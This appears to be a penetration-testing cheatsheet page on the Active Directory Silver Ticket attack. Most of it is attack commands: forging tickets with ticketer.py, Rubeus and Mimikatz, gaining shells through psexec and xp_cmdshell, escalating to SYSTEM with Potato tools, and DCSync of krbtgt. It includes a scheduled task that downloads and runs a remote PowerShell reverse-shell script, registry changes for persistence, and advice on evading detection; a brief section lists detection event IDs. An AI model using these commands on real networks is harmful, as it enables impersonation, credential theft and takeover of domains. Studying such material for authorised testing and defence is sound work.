daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

silver-ticket.md (11713B)


      1 ---
      2 title: "Silver Ticket"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/active-directory-methodology/silver-ticket.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/silver-ticket.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Silver Ticket
     14 
     15 ## Silver ticket
     16 
     17 The **Silver Ticket** attack involves the exploitation of service tickets in Active Directory (AD) environments. This method relies on **acquiring the NTLM hash of a service account**, such as a computer account, to forge a Ticket Granting Service (TGS) ticket. With this forged ticket, an attacker can access specific services on the network, **impersonating any user**, typically aiming for administrative privileges. It's emphasized that using AES keys for forging tickets is more secure and less detectable.<sup>[[1]](#references)[[2]](#references)</sup>
     18 
     19 > [!WARNING]
     20 > Silver Tickets are less detectable than Golden Tickets because they only require the **hash of the service account**, not the krbtgt account. However, they are limited to the specific service they target. Moreover, just stealing the password of a user.
     21 Moreover, if you compromise an **account's password with a SPN** you can use that password to create a Silver Ticket impersonating any user to that service.
     22 
     23 ### Modern Kerberos changes (AES-only domains)
     24 
     25 - Windows updates starting **8 Nov 2022 (KB5021131)** default service tickets to **AES session keys** when possible and are phasing out RC4. DCs are expected to ship with RC4 **disabled by default by mid‑2026**, so relying on NTLM/RC4 hashes for silver tickets increasingly fails with `KRB_AP_ERR_MODIFIED`. Always extract **AES keys** (`aes256-cts-hmac-sha1-96` / `aes128-cts-hmac-sha1-96`) for the target service account.<sup>[[5]](#references)</sup>
     26 - If the service account `msDS-SupportedEncryptionTypes` is restricted to AES, you must forge with `/aes256` or `-aesKey`; RC4 (`/rc4` or `-nthash`) will not work even if you hold the NTLM hash.<sup>[[6]](#references)</sup>
     27 - gMSA/computer accounts rotate every 30 days; dump the **current AES key** from LSASS, Secretsdump/NTDS, or DCsync before forging.
     28 - OPSEC: default ticket lifetime in tools is often **10 years**; set realistic durations (e.g., `-duration 600` minutes) to avoid detection by abnormal lifetimes.<sup>[[6]](#references)</sup>
     29 
     30 For ticket crafting, different tools are employed based on the operating system:
     31 
     32 ### On Linux
     33 
     34 ```bash
     35 # Forge with AES instead of RC4 (supports gMSA/machine accounts)
     36 python ticketer.py -aesKey <AES256_HEX> -domain-sid <DOMAIN_SID> -domain <DOMAIN> \
     37   -spn <SERVICE_PRINCIPAL_NAME> <USER>
     38 # or read key directly from a keytab (useful when only keytab is obtained)
     39 python ticketer.py -keytab service.keytab -spn <SPN> -domain <DOMAIN> -domain-sid <DOMAIN_SID> <USER>
     40 
     41 # shorten validity for stealth
     42 python ticketer.py -aesKey <AES256_HEX> -domain-sid <DOMAIN_SID> -domain <DOMAIN> \
     43   -spn cifs/<HOST_FQDN> -duration 480 <USER>
     44 
     45 export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache
     46 python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass
     47 ```
     48 
     49 ### On Windows
     50 
     51 ```bash
     52 # Using Rubeus to request a service ticket and inject (works when you already have a TGT)
     53 # /ldap option is used to get domain data automatically
     54 rubeus.exe asktgs /user:<USER> [/aes256:<HASH> /aes128:<HASH> /rc4:<HASH>] \
     55   /domain:<DOMAIN> /ldap /service:cifs/<TARGET_FQDN> /ptt /nowrap /printcmd
     56 
     57 # Forging the ticket directly with Mimikatz (silver ticket => /service + /target)
     58 mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> \
     59   /aes256:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET> /ptt"
     60 # RC4 still works only if the DC and service accept RC4
     61 mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> \
     62   /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET> /ptt"
     63 
     64 # Inject an already forged kirbi
     65 mimikatz.exe "kerberos::ptt <TICKET_FILE>"
     66 .\Rubeus.exe ptt /ticket:<TICKET_FILE>
     67 
     68 # Obtain a shell
     69 .\PsExec.exe -accepteula \\<TARGET> cmd
     70 ```
     71 
     72 The CIFS service is highlighted as a common target for accessing the victim's file system, but other services like HOST and RPCSS can also be exploited for tasks and WMI queries.
     73 
     74 ### Example: MSSQL service (MSSQLSvc) + Potato to SYSTEM
     75 
     76 If you have the NTLM hash (or AES key) of a SQL service account (e.g., sqlsvc) you can forge a TGS for the MSSQL SPN and impersonate any user to the SQL service. From there, enable xp_cmdshell to execute commands as the SQL service account. If that token has SeImpersonatePrivilege, chain a Potato to elevate to SYSTEM.<sup>[[4]](#references)</sup>
     77 
     78 ```bash
     79 # Forge a silver ticket for MSSQLSvc (AES example)
     80 python ticketer.py -aesKey <SQLSVC_AES256> -domain-sid <DOMAIN_SID> -domain <DOMAIN> \
     81   -spn MSSQLSvc/<host.fqdn>:1433 administrator
     82 export KRB5CCNAME=$PWD/administrator.ccache
     83 
     84 # Connect to SQL using Kerberos and run commands via xp_cmdshell
     85 impacket-mssqlclient -k -no-pass <DOMAIN>/administrator@<host.fqdn>:1433 \
     86   -q "EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;EXEC xp_cmdshell 'whoami'"
     87 ```
     88 
     89 - If the resulting context has SeImpersonatePrivilege (often true for service accounts), use a Potato variant to get SYSTEM:
     90 
     91 ```bash
     92 # On the target host (via xp_cmdshell or interactive), run e.g. PrintSpoofer/GodPotato
     93 PrintSpoofer.exe -c "cmd /c whoami"
     94 # or
     95 GodPotato -cmd "cmd /c whoami"
     96 ```
     97 
     98 More details on abusing MSSQL and enabling xp_cmdshell:
     99 
    100 [Abusing Ad Mssql](/hacktricks/windows-hardening/active-directory-methodology/abusing-ad-mssql)
    101 
    102 Potato techniques overview:
    103 
    104 [Roguepotato And Printspoofer](/hacktricks/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer)
    105 
    106 ## Available Services
    107 
    108 | Service Type                               | Service Silver Tickets                                                     |
    109 | ------------------------------------------ | -------------------------------------------------------------------------- |
    110 | WMI                                        | <p>HOST</p><p>RPCSS</p>                                                    |
    111 | PowerShell Remoting                        | <p>HOST</p><p>HTTP</p><p>Depending on OS also:</p><p>WSMAN</p><p>RPCSS</p> |
    112 | WinRM                                      | <p>HOST</p><p>HTTP</p><p>In some occasions you can just ask for: WINRM</p> |
    113 | Scheduled Tasks                            | HOST                                                                       |
    114 | Windows File Share, also psexec            | CIFS                                                                       |
    115 | LDAP operations, included DCSync           | LDAP                                                                       |
    116 | Windows Remote Server Administration Tools | <p>RPCSS</p><p>LDAP</p><p>CIFS</p>                                         |
    117 | Golden Tickets                             | krbtgt                                                                     |
    118 
    119 Using **Rubeus** you may **ask for all** these tickets using the parameter:
    120 
    121 - `/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm`
    122 
    123 ### Silver tickets Event IDs
    124 
    125 - 4624: Account Logon
    126 - 4634: Account Logoff
    127 - 4672: Admin Logon
    128 - **No preceding 4768/4769 on the DC** for the same client/service is a common indicator of a forged TGS being presented directly to the service.
    129 - Abnormally long ticket lifetime or unexpected encryption type (RC4 when domain enforces AES) also stand out in 4769/4624 data.
    130 
    131 ## Persistence
    132 
    133 To avoid machines from rotating their password every 30 days set  `HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange = 1` or you could set `HKLM\SYSTEM\CurrentControlSet\Services\NetLogon\Parameters\MaximumPasswordAge` to a bigger value than 30days to indicate the rotation perdiod when the machines password should be rotated.<sup>[[3]](#references)</sup>
    134 
    135 ## Abusing Service tickets
    136 
    137 In the following examples lets imagine that the ticket is retrieved impersonating the administrator account.
    138 
    139 ### CIFS
    140 
    141 With this ticket you will be able to access the `C$` and `ADMIN$` folder via **SMB** (if they are exposed) and copy files to a part of the remote filesystem just doing something like:
    142 
    143 ```bash
    144 dir \\vulnerable.computer\C$
    145 dir \\vulnerable.computer\ADMIN$
    146 copy afile.txt \\vulnerable.computer\C$\Windows\Temp
    147 ```
    148 
    149 You will also be able to obtain a shell inside the host or execute arbitrary commands using **psexec**:
    150 
    151 
    152 [Psexec And Winexec](/hacktricks/windows-hardening/lateral-movement/psexec-and-winexec)
    153 
    154 ### HOST
    155 
    156 With this permission you can generate scheduled tasks in remote computers and execute arbitrary commands:
    157 
    158 ```bash
    159 #Check you have permissions to use schtasks over a remote server
    160 schtasks /S some.vuln.pc
    161 #Create scheduled task, first for exe execution, second for powershell reverse shell download
    162 schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
    163 schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
    164 #Check it was successfully created
    165 schtasks /query /S some.vuln.pc
    166 #Run created schtask now
    167 schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"
    168 ```
    169 
    170 ### HOST + RPCSS
    171 
    172 With these tickets you can **execute WMI in the victim system**:
    173 
    174 ```bash
    175 #Check you have enough privileges
    176 Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
    177 #Execute code
    178 Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand"
    179 
    180 #You can also use wmic
    181 wmic remote.computer.local list full /format:list
    182 ```
    183 
    184 Find **more information about wmiexec** in the following page:
    185 
    186 
    187 [Wmiexec](/hacktricks/windows-hardening/lateral-movement/wmiexec)
    188 
    189 ### HOST + WSMAN (WINRM)
    190 
    191 With winrm access over a computer you can **access it** and even get a PowerShell:
    192 
    193 ```bash
    194 New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC
    195 ```
    196 
    197 Check the following page to learn **more ways to connect with a remote host using winrm**:
    198 
    199 
    200 [Winrm](/hacktricks/windows-hardening/lateral-movement/winrm)
    201 
    202 > [!WARNING]
    203 > Note that **winrm must be active and listening** on the remote computer to access it.
    204 
    205 ### LDAP
    206 
    207 With this privilege you can dump the DC database using **DCSync**:
    208 
    209 ```text
    210 mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt
    211 ```
    212 
    213 **Learn more about DCSync** in the following page:
    214 
    215 
    216 [Dcsync](/hacktricks/windows-hardening/active-directory-methodology/dcsync)
    217 
    218 
    219 ## References
    220 
    221 - [1] [Kerberos: Silver Tickets - ired.team](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets)
    222 - [2] [Kerberos (II): How to attack Kerberos? - Tarlogic](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
    223 - [3] [Machine Account Password Process - Microsoft Tech Community](https://techcommunity.microsoft.com/blog/askds/machine-account-password-process/396027)
    224 - [4] [HTB Sendai – 0xdf: Silver Ticket + Potato path](https://0xdf.gitlab.io/2025/08/28/htb-sendai.html)
    225 - [5] [KB5021131 Kerberos hardening & RC4 deprecation](https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d)
    226 - [6] [Impacket ticketer.py current options (AES/keytab/duration)](https://kb.offsec.nl/tools/framework/impacket/ticketer-py/)